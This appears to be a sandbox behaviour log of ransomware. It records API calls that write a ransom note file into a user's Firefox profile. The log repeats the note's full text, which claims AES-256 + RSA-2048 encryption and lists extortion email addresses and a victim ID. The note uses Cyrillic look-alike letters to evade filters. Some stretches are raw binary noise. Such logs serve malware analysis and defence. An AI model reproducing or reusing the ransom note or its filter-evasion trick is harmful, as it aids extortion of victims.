\\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n¤#9#,&«\x1e­\x8c…?4kP@<õL\x88f#Öã\x9b\x1d\x8e\x8c¥Ù\x09,Z/µ×jd0\x88\x9d]8ÏgNFâ.Ä4ìïÎ1ð£\x0bkzsµ³[÷\x96\x1d\x0eÖ\x97\x8d\x07q?G\x16~\x03\x13\x88ª#C6ôaK=\x96\x0f%ǨæúpW¼\x88²pµ´ò{Îî(sÛ\x1cC\x01þáý\x9aYf}\x1e\x13£1/ø¡r$oÛ\x03Û/¤ê\x83\x0b{¸zu\x9c%2±VX*P\x1dZ\x95´Ñ-\x835\x8c\x8a¶ \"èÃÐì'\n\x91\x9ee<\rÜ.ß0©Ö\x18ù\x1b!o\x8aͶ\x1a\x1cnô\x04\x80´*+¯~ÐJ9*à²9+|¨ð\x1eò\x98Ó\x0b", lpUsedDefaultChar=0x0) returned 7247 [0067.691] WriteFile (in: hFile=0x1bc, lpBuffer=0x2668a38*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2668a38*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0067.692] CloseHandle (hObject=0x1bc) returned 1 [0067.693] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\bg85_info.rtf")) returned 0xffffffff [0067.693] GetLastError () returned 0x2 [0067.693] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\indexedDB\\moz-safe-about+home\\idb\\BG85_INFO.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\indexeddb\\moz-safe-about+home\\idb\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0067.819] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0067.819] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up 